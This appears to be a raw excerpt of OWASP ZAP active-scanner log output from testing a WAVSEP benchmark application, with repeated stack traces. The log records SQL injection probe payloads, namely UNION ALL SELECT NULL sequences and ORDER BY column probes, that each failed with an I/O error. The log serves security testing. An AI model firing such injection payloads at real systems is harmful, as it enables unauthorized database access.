9461# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680044 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680045 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680047 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680048 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680051 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680053 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680054 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680055 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680056 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680057 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680059 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680060 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 8034#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 8034# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 